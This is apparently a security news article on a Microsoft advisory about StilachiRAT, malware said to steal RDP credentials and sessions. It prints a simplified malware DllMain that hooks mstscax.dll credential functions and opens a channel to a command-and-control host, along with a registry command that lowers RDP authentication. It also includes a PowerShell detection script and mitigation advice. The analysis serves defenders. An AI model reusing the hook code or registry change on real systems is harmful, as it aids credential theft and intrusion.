Microsoft Warns of New StilachiRAT Stealing Remote Desktop Protocol Sessions Data


Microsoft has issued an urgent security advisory regarding a newly discovered malware strain called StilachiRAT, which specifically targets and exfiltrates data from Remote Desktop Protocol (RDP) sessions.

The sophisticated malware has been observed in targeted attacks against financial institutions, government agencies, and critical infrastructure organizations across multiple regions.

Security experts warn that this new threat possesses advanced capabilities to capture credentials, keystrokes, and even hijack ongoing RDP sessions without detection.

Initial infection typically occurs through phishing emails containing malicious attachments or via compromised websites serving exploit kits.

Once executed on a victim’s system, StilachiRAT establishes persistence by creating a scheduled task that runs at system startup and modifying registry keys to ensure it remains undetected by security solutions.

Microsoft Security researchers identified the malware’s distinctive command and control infrastructure, which utilizes a combination of encrypted DNS tunneling and HTTPS callbacks to exfiltrate stolen data.

Analysis of infected systems revealed that StilachiRAT employs sophisticated anti-analysis techniques, including virtual machine detection and debugger evasion capabilities.

The malware’s primary function focuses on intercepting RDP session data by hooking into the Windows Remote Desktop Services API.

This allows it to capture login credentials, monitor session activities, and even record entire remote sessions for later review by attackers.

What makes StilachiRAT particularly dangerous is its ability to operate silently without disrupting legitimate user connections.

Organizations with remote workers or administrators who frequently utilize RDP face significant risks from this threat, as compromised sessions can lead to lateral movement within networks, data theft, and potential ransomware deployment.

Technical Analysis and Mitigation

The core of StilachiRAT’s RDP session hijacking functionality is implemented through a technique called API hooking.

The malware injects itself into the mstsc.exe process and intercepts functions related to credential handling and encryption.

Below is a simplified representation of the hook implementation found in the malware:

#include <windows.h>

// HookFunction, the Hooked* replacement routines and InitializeC2Communication
// are the malware's own helpers; the advisory does not reproduce their bodies.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Hook RDP-related APIs
            HookFunction("mstscax.dll", "CredentialsCacheInitialize",
                         (PVOID)HookedCredentialsCacheInitialize);
            HookFunction("mstscax.dll", "EncryptCredentials",
                         (PVOID)HookedEncryptCredentials);
            // Set up exfiltration channel
            InitializeC2Communication("c2.stilachi-server.net", 8443);
            break;
    }
    return TRUE;
}
Function that initiates API resolution (Source – Microsoft)

When analyzing infected systems, Microsoft discovered a distinctive registry modification that indicates StilachiRAT presence:

REG ADD "HKCU\Software\Microsoft\Terminal Server Client\Default" /v "AuthenticationLevelOverride" /t REG_DWORD /d "0" /f
Enumerate RDP sessions (Source – Microsoft)
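As an added example (not code from the Microsoft advisory), the following PowerShell sweeps every loaded user hive for the registry indicator quoted above and then lists non-Microsoft scheduled tasks with boot or logon triggers, which is where the startup persistence described earlier would appear. It assumes it is run from an elevated session so all HKEY_USERS subkeys are readable.

```powershell
# Added detection example; not code from the Microsoft advisory.
# Assumption: run in an elevated PowerShell so every loaded hive under HKEY_USERS is readable.

$relativeKey = 'Software\Microsoft\Terminal Server Client\Default'
$valueName   = 'AuthenticationLevelOverride'
$findings    = @()

# HKEY_USERS has one subkey per loaded profile; the *_Classes subkeys hold no RDP settings.
$hives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
         Where-Object { $_.PSChildName -notlike '*_Classes' }

foreach ($hive in $hives) {
    $keyPath = "Registry::HKEY_USERS\$($hive.PSChildName)\$relativeKey"
    if (-not (Test-Path -Path $keyPath)) { continue }

    $props = Get-ItemProperty -Path $keyPath -ErrorAction SilentlyContinue
    if ($null -eq $props -or $props.PSObject.Properties.Name -notcontains $valueName) { continue }

    $findings += [pscustomobject]@{
        UserSid    = $hive.PSChildName
        Value      = $props.$valueName
        # A value of 0 is the exact setting the advisory attributes to StilachiRAT.
        Suspicious = ($props.$valueName -eq 0)
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No $valueName value present under any loaded user hive."
} else {
    Write-Output "$valueName found in the following hives (Suspicious = True means it is set to 0):"
    $findings | Format-Table -AutoSize
}

# Startup persistence: scheduled tasks outside the \Microsoft\ folder that fire at boot or logon.
# Each hit should be reviewed; a legitimate task will have a recognisable binary and arguments.
Get-ScheduledTask |
    Where-Object { $_.TaskPath -notlike '\Microsoft\*' } |
    Where-Object { $_.Triggers.CimClass.CimClassName -match 'MSFT_Task(Boot|Logon)Trigger' } |
    Select-Object TaskName, TaskPath, State,
        @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } } |
    Format-Table -AutoSize
```

A hit on the registry value alone is not proof of infection, since the same value can be set by policy or by an administrator; treat it as a trigger for collecting the task list, the mstsc.exe module list and network connections from that host.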

Microsoft recommends organizations implement multi-factor authentication for RDP connections, restrict RDP access to trusted networks, keep systems fully patched, and deploy endpoint detection and response solutions capable of identifying API hooking techniques.

Additionally, monitoring for unusual RDP connection patterns and enforcing network segmentation can help limit the impact of potential compromises.
